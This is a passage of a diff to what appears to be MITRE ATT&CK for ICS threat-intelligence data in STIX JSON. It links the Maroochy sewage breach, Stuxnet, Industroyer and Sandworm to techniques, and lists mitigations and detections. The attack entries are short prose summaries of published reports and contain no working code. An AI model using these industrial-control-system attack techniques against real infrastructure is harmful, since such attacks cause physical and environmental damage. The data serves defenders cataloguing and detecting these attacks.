"relationship--642cae89-bb5c-46f3-9fea-8d747b930c35", + "created": "2023-03-10T20:11:10.018Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Marshall Abrams July 2008", + "description": "Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ", + "url": "https://www.mitre.org/sites/default/files/pdf/08_1145.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T22:03:14.174Z", + "description": "In the [Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020), the adversary gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. This ultimately led to 800,000 liters of raw sewage being spilled out into the community. 
The raw sewage affected local parks, rivers, and even a local hotel. This resulted in harm to marine life and produced a sickening stench from the community's affected rivers.(Citation: Marshall Abrams July 2008)", + "relationship_type": "uses", + "source_ref": "campaign--70cab19e-1745-425e-b3db-c02cd5ff157a", + "target_ref": "attack-pattern--83ebd22f-b401-4d59-8219-2294172cf916", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--be532c78-daf5-431b-adae-ab11af395513", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:16:39.070Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) executes malicious SQL commands in the WinCC database server to propagate to remote systems. The malicious SQL commands include xp_cmdshell, sp_dumpdbilog, and sp_addextendedproc. 
(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7d5759cd-890e-4ec5-b92b-aba225d52960", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T13:49:40.767Z", + "description": "Authenticate connections fromsoftware and devices to prevent unauthorized systems from accessing protected management functions.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1377fdf9-5201-4204-b6d3-df2fb5f4d02f", + "created": "2022-09-26T18:41:48.947Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T18:41:48.947Z", + "description": "Monitor for firmware changes which may be observable via operational alarms from devices.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + 
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f20d8eed-b517-4297-b32a-9a5e0845de9f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.150Z", + "relationship_type": "mitigates", + "description": "All devices or systems changes, including all administrative functions, should require authentication. Consider using access management technologies to enforce authorization on all management interface access attempts, especially when the device does not inherently provide strong authentication and authorization functions.\n", + "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--c6520346-fe47-44ce-af75-d99004ac2977", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 
2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:17:59.179Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) can reprogram a PLC and change critical parameters in such a way that legitimate commands can be overridden or intercepted. In addition, Stuxnet can apply inappropriate command sequences or parameters to cause damage to property. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--1af9e3fd-2bcc-414d-adbd-fe3b95c02ca1", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3aa69e19-f55f-4531-a26e-eb67d6ea24ee", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:11:14.662Z", + "description": "Monitor for the termination of processes or services associated with ICS automation protocols and application software which could help detect blocked communications.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f", + "target_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--69146c10-d3d0-4f69-8164-9c21a1a4e10b", + 
"created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:17:44.736Z", + "description": "Monitor ICS automation protocols for anomalies related to reading point or tag data, such as new assets using these functions, changes in volume or timing, or unusual information being queried. Many protocols provide multiple ways to achieve the same result (e.g., functions with/without an acknowledgment or functions that operate on a single point vs. multiple points). Monitor for changes in the functions used.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7db9687b-7099-4cb6-a040-bc32fc549a81", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.195Z", + "relationship_type": "mitigates", + "description": "Protocols used for control functions should provide authenticity through MAC functions or digital signatures. 
If not, utilize bump-in-the-wire devices or VPNs to enforce communication authenticity between devices that are not capable of supporting this (e.g., legacy controllers, RTUs).\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--e02565fe-65ff-4b70-8a8d-b0abf6d9a9f4", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:45:37.289Z", + "description": "Monitor authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours, including use of [Valid Accounts](https://attack.mitre.org/techniques/T0859).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b", + "target_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2f6b635b-1441-4ef0-9289-1ed6b9098d4a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.240Z", + "relationship_type": "mitigates", + "description": "Reduce the range of RF communications to their intended operating range when possible. 
Propagation reduction methods may include (i) reducing transmission power on wireless signals, (ii) adjusting antenna gain to prevent extensions beyond organizational boundaries, and (iii) employing RF shielding techniques to block excessive signal propagation. (Citation: DHS National Urban Security Technology Laboratory April 2019)\n", + "source_ref": "course-of-action--fce6866f-9a87-4d3e-a73c-f02d8937fe0e", + "target_ref": "attack-pattern--0fe075d5-beac-4d02-b93e-0f874997db72", + "external_references": [ + { + "source_name": "DHS National Urban Security Technology Laboratory April 2019", + "description": "DHS National Urban Security Technology Laboratory 2019, April Radio Frequency Detection, Spectrum Analysis, and Direction Finding Equipment Retrieved. 2020/09/17 ", + "url": "https://www.dhs.gov/sites/default/files/saver-msr-rf-detection_cod-508_10july2019.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ae10e97a-90ac-498b-8601-01081dc4af8b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-12T18:59:17.429Z", + "modified": "2022-05-06T17:47:24.188Z", + "relationship_type": "mitigates", + "description": "Limit the accounts that may use remote services. 
Limit the permissions for accounts that are at higher risk of compromise; for example, configure SSH so users can only run specific programs.\n", + "source_ref": "course-of-action--e57ebc6d-785f-40c8-adb1-b5b5e09b3b48", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--8ca2fe75-9bb3-4af5-8fee-accd33d6d2ec", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.101Z", + "relationship_type": "mitigates", + "description": "Ensure remote commands that enable device shutdown are disabled if they are not necessary. Examples include DNP3's 0x0D function code or unnecessary device management functions.\n", + "source_ref": "course-of-action--d0909119-2f71-4923-87db-b649881672d7", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--df6da4ec-cbe8-4f93-a41f-3726a9491938", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T16:46:30.174Z", + "description": "Statically defined ARP entries can prevent manipulation and sniffing of switched network traffic, as some AiTM techniques depend on sending spoofed ARP messages to manipulate network host's dynamic ARP tables.\n", + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a", + "target_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--648c6649-5861-4b43-a7e5-a9665bafb576", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:17:15.157Z", + "description": "[Industroyer](https://attack.mitre.org/software/S0604) uses the first COM port from the configuration file for the communication and the other two COM ports are opened to prevent other processes accessing them. This may block processes or operators from getting reporting messages from a device. 
(Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--97641754-f215-4b8f-b0cd-0d3142053c76", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "McAfee CHIPSEC Blog", + "description": "Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against Vault 7 Disclosure Scanning. Retrieved March 13, 2017.", + "url": "https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/" + }, + { + "source_name": "MITRE Copernicus", + "description": "Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions about BIOS Security. Retrieved December 11, 2015.", + "url": "http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about" + }, + { + "source_name": "Intel HackingTeam UEFI Rootkit", + "description": "Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. Retrieved March 20, 2017.", + "url": "http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html" + }, + { + "source_name": "Github CHIPSEC", + "description": "Intel. (2017, March 18). CHIPSEC Platform Security Assessment Framework. Retrieved March 20, 2017.", + "url": "https://github.com/chipsec/chipsec" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:48:56.024Z", + "description": "Monitor firmware for unexpected changes. 
Asset management systems should be consulted to understand known-good firmware versions. Dump and inspect BIOS images on vulnerable systems and compare against known good images.(Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior. Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed.(Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--590bdd67-31ef-4edd-b2ac-2bd1b98da19c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.201Z", + "relationship_type": "mitigates", + "description": "Consider removal or disabling of programs and features which may be used to run malicious scripts (e.g., scripting language IDEs, PowerShell, visual studio).\n", + "source_ref": "course-of-action--d0909119-2f71-4923-87db-b649881672d7", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + 
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--bda03e8d-5e06-4470-b786-11b11c7c97c7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.203Z", + "relationship_type": "mitigates", + "description": "Deploy anti-virus on all systems that support external email.\n", + "source_ref": "course-of-action--faf2b40e-5981-433f-aa46-17458e0026f7", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--3c5bc8de-a7a4-4bda-a82f-8d149ec927f1", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:11:30.678Z", + "description": "Monitor operational process data for write commands for an excessive number of I/O points or manipulating a single value an excessive number of times. 
This will not directly detect the technique’s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95", + "target_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--32dbed4e-4dbe-4872-a013-c96111ed102e", + "created": "2021-04-11T14:06:54.109Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + }, + { + "source_name": "ICS-CERT February 2016", + "description": "ICS-CERT 2016, February 25 Cyber-Attack Against Ukrainian Critical Infrastructure Retrieved. 2019/03/08 ", + "url": "https://ics-cert.us-cert.gov/alerts/IR-ALERT-H-16-056-01" + }, + { + "source_name": "John Hultquist January 2016", + "description": "John Hultquist 2016, January 07 Sandworm Team and the Ukrainian Power Authority Attacks Retrieved. 2019/03/08 ", + "url": "https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html" + }, + { + "source_name": "Zetter, Kim March 2016", + "description": "Zetter, Kim 2016, March 03 INSIDE THE CUNNING, UNPRECEDENTED HACK OF UKRAINE'S POWER GRID Retrieved. 
2019/03/08 ", + "url": "https://www.wired.com/2016/03/inside-cunning-unprecedented-hack-ukraines-power-grid/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:54:58.823Z", + "description": "In the Ukraine 2015 Incident, [Sandworm Team](https://attack.mitre.org/groups/G0034) harvested VPN worker credentials and used them to remotely log into control system networks. (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016) (Citation: Zetter, Kim March 2016) (Citation: ICS-CERT February 2016) (Citation: John Hultquist January 2016)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ca64a927-f050-41b3-80d3-93d22cdef26a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.081Z", + "relationship_type": "mitigates", + "description": "Ensure that unnecessary ports and services are closed to prevent risk of discovery and potential exploitation.\n", + "source_ref": "course-of-action--d0909119-2f71-4923-87db-b649881672d7", + "target_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--3dc3aec5-0056-46e8-8073-a7e32d3d929d", + "created": "2022-09-30T15:28:37.614Z", + "revoked": false, + 
"object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-30T15:28:37.614Z", + "description": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fc1d3924-3210-4ca6-b3cc-a7a525eab47c", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T17:15:27.767Z", + "description": "Monitor ICS management protocols / file transfer protocols for protocol functions related to firmware changes.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d406671b-4d22-4cd5-8568-d04b0b70b51c", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:49:29.157Z", + 
"description": "Monitor asset log which may provide information that an asset has been placed into Firmware Update Mode. Some assets may log firmware updates themselves without logging that the device has been placed into update mode.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2b62e4c0-9267-47bd-8f4d-0394b13fb566", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.127Z", + "relationship_type": "mitigates", + "description": "Once an adversary has access to a remote GUI they can abuse system features, such as required HMI functions.\n", + "source_ref": "course-of-action--469b78dd-a54d-4f7c-8c3b-4a1dd916b433", + "target_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5de6bf53-0a02-439b-a8d0-248fa9640a36", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.201Z", + "relationship_type": "mitigates", + "description": "Audit the integrity of PLC system and application code functionality, such as the manipulation of standard function blocks (e.g., Organizational Blocks) that manage the execution of application 
logic programs. (Citation: IEC February 2019)\n", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", + "external_references": [ + { + "source_name": "IEC February 2019", + "description": "IEC 2019, February Security for industrial automation and control systems - Part 4-2: Technical security requirements for IACS components Retrieved. 2020/09/25 ", + "url": "https://webstore.iec.ch/publication/34421" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--9d4be020-4ab0-4f10-9a20-ae8a2886038f", + "created": "2022-09-27T18:40:11.818Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:12:41.739Z", + "description": "In the case of detecting collection from shared network drives monitor for unexpected and abnormal accesses to network shares. 
